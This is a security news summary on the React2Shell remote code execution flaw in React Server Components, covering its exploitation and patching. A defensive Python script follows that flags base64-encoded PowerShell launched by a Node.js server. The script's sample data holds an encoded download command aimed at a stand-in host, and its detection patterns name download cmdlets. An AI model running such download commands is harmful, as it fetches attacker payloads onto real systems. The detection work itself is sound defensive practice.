https://www.bleepingcomputer.com/news/security/react2shell-flaw-exploited-to-breach-30-orgs-77k-ip-addresses-vulnerable

Security researchers have sounded the alarm over the critical React2Shell remote code execution vulnerability (CVE-2025-55182), which affects over 77,000 internet-exposed IP addresses worldwide. The flaw, which allows unauthenticated remote code execution via a single HTTP request, has already been exploited by threat actors to compromise more than 30 organisations across multiple sectors, including intrusions linked to known state-associated Chinese hacking groups.

The React2Shell vulnerability affects all frameworks that implement React Server Components, including Next.js. Fixing it requires developers to update React, rebuild their applications, and redeploy. Researchers have observed widespread exploitation, with attackers using automated tools to scan for vulnerable systems and execute base64-encoded PowerShell commands to download and deploy additional malware, such as Cobalt Strike beacons and the Snowlight and Vshell backdoors associated with Chinese threat actors.

In response to the severity of the flaw, organisations worldwide have rushed to patch their systems. Cloudflare has rolled out emergency detections and mitigations in its Web Application Firewall (WAF), and the Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2025-55182 to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply the necessary updates by December 26, 2025. All organisations using React Server Components or related frameworks should immediately apply the available patches and closely monitor their systems for signs of compromise.
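As an added example (not from the article or any vendor), one way to monitor for the base64-encoded PowerShell activity described above is to decode `-EncodedCommand` arguments in process-creation telemetry and flag launches whose parent is the web server runtime. The record fields, the `node.exe` parent name and the sample events are assumptions constructed for illustration.

```python
import base64
import re

# Assumption: the React Server Components app runs under Node.js on Windows.
SERVER_PARENTS = {"node.exe"}
FLAG_RE = re.compile(r"(?:^|\s)[-/](e\w*)\s+([A-Za-z0-9+/=]{8,})", re.I)
DOWNLOAD_RE = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile", re.I)

def decode_encoded_command(cmdline):
    """Return the decoded script passed via -EncodedCommand (or a prefix), else None."""
    for flag, blob in FLAG_RE.findall(cmdline):
        flag = flag.lower()
        if flag != "ec" and not "encodedcommand".startswith(flag):
            continue  # a different switch, e.g. -ExecutionPolicy
        try:  # PowerShell expects base64 over UTF-16LE text
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except ValueError:
            continue  # not valid base64 / UTF-16LE, keep looking
    return None

def triage(events):
    """Return one finding per PowerShell launch that carries an encoded command."""
    findings = []
    for ev in events:
        image = ev["image"].lower().rsplit("\\", 1)[-1]
        parent = ev["parent"].lower().rsplit("\\", 1)[-1]
        if image not in ("powershell.exe", "pwsh.exe"):
            continue
        script = decode_encoded_command(ev["cmdline"])
        if script is not None:
            findings.append({"parent": parent, "script": script,
                             "from_server": parent in SERVER_PARENTS,
                             "downloads": bool(DOWNLOAD_RE.search(script))})
    return findings

def _enc(script):  # helper used only to build the constructed samples below
    return base64.b64encode(script.encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed records, not taken from any real incident
    {"parent": r"C:\app\node.exe", "image": PS, "cmdline": "powershell -NoP -enc "
     + _enc("Invoke-WebRequest https://example.invalid/constructed -OutFile c.bin")},
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": r"powershell -ExecutionPolicy RemoteSigned -File C:\ops\backup.ps1"},
    {"parent": r"C:\Windows\System32\services.exe", "image": PS,
     "cmdline": "powershell -e " + _enc("Get-Date")},
]

if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))
```

A finding with `from_server` set means the web application process itself started PowerShell, which a normal deployment rarely does, so it deserves review before the others.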